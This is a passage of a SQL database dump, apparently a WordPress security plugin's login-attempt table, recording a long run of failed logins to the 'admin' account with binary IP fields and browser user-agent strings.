(X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3383,5832,1629263072.685887,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3384,5833,1629263268.202478,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3385,5834,1629263472.864970,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3386,5835,1629263679.168252,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3387,5836,1629263875.992846,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A<\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3388,5837,1629264088.870222,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���cN�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3389,5838,1629264283.831705,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/d�?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3390,5839,1629264480.799471,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3391,5840,1629264683.205317,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3392,5841,1629264894.613918,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3393,5842,1629265090.456317,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e�8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3394,5843,1629265287.943804,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ʰ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3395,5844,1629265515.997300,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3396,5845,1629265689.556165,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3397,5846,1629265924.077005,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3KZ\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3398,5847,1629266101.497873,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#ߧ9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3399,5848,1629266302.920086,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3400,5849,1629266539.690918,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Wb��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3401,5850,1629266710.615794,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e�8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3402,5851,1629266916.457584,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3403,5852,1629267118.021011,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3404,5853,1629267327.907201,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t2~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3405,5854,1629267557.280687,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Օg�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3406,5855,1629267763.565326,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3407,5856,1629268082.820977,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3408,5857,1629268308.947938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3409,5858,1629268510.677523,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3410,5859,1629268708.377418,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���h,q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3411,5860,1629268923.678483,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Wb��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3412,5861,1629269306.547001,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3413,5862,1629269510.883336,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���p�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3414,5863,1629269941.524272,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3415,5864,1629270150.796846,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3416,5865,1629270327.150427,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=�F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3417,5866,1629270554.911650,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3418,5866,1629270554.948795,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3419,5867,1629270759.052904,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��£��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3420,5868,1629270963.814321,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ʰ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3421,5869,1629271180.158714,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3422,5870,1629271380.057410,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3423,5871,1629271562.603968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3424,5871,1629271562.651744,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3425,5872,1629271770.441443,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gyY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3426,5873,1629271976.084594,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3427,5874,1629272207.319474,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3428,5875,1629272407.643876,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3429,5876,1629272623.765464,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4��~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3430,5877,1629272803.290431,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3431,5878,1629273044.183417,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3432,5879,1629273223.020605,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3433,5880,1629273459.492370,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��O�-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3434,5881,1629273850.446002,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���C�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3435,5882,1629274089.137566,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"P�}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3436,5883,1629274271.898611,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3437,5884,1629274490.691809,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3438,5885,1629274693.778769,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3439,5886,1629274935.029363,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3440,5887,1629275114.847747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-@6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3441,5888,1629275325.372068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#ݵ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3442,5889,1629275558.659529,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3443,5890,1629275749.919967,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_nq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3444,5891,1629275961.682711,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3445,5892,1629276201.254777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3446,5893,1629276425.651830,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3447,5894,1629276629.416534,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3448,5895,1629276822.430050,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�2�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3449,5896,1629277054.039758,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3450,5897,1629277241.006560,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3451,5898,1629278109.482829,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3452,5899,1629278488.525436,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3453,5900,1629278835.853446,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��o���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3454,5901,1629279228.962901,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3455,5902,1629279552.171106,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�\"o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3456,5903,1629279914.058819,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\'B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3457,5904,1629280302.117122,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ca�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3458,5905,1629280667.060244,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3459,5906,1629281384.562052,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3460,5907,1629281757.141767,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3461,5909,1629282522.857421,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gij','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3462,5909,1629282522.942885,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gij','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3463,5910,1629282884.161480,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3464,5911,1629283262.484532,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gk�s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3465,5912,1629283631.991229,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\05�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3466,5912,1629283632.094462,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\05�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3467,5913,1629284001.770293,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3468,5914,1629284340.614790,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/jv�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3469,5915,1629284745.561310,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3470,5916,1629285117.203513,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3471,5917,1629285465.203796,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3472,5918,1629285831.002134,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ŜJ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3473,5919,1629286234.115034,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3474,5920,1629286551.259044,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3475,5921,1629286942.921992,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3476,5922,1629287350.008777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3477,5923,1629287697.359596,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3478,5923,1629287697.418120,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3479,5924,1629288057.561699,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ғ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3480,5926,1629288825.937696,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3481,5927,1629289214.745147,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ʰ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3482,5928,1629289605.121987,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ů�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3483,5929,1629289992.726776,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3484,5930,1629290375.118720,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/jɆ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3485,5931,1629290754.100123,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�X)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3486,5932,1629291075.815022,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3487,5933,1629291489.283200,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3488,5934,1629291887.624723,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3489,5935,1629292278.246948,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3490,5936,1629292718.594675,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����K�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3491,5937,1629293452.012468,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3492,5938,1629293823.621264,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y�ji','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3493,5939,1629294252.468667,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3494,5940,1629294617.941797,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#ݵ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3495,5941,1629295003.154609,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/4�*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3496,5943,1629295804.383079,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3497,5944,1629296178.405784,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H\n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3498,5945,1629296623.618808,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4��~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3499,5946,1629296991.227732,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3500,5946,1629296991.315978,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3501,5947,1629297371.098952,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3502,5948,1629297773.469950,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3503,5949,1629298147.426032,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���&V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3504,5950,1629298547.505611,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\r\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3505,5951,1629298699.915001,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(3506,5952,1629298897.485452,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3507,5953,1629299342.217615,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2tb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3508,5954,1629299502.788326,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(3509,5955,1629299725.944143,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���	F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3510,5956,1629299907.613608,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),(3511,5957,1629300115.216305,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3512,5958,1629300308.977763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��իо','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(3513,5959,1629300506.552023,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; 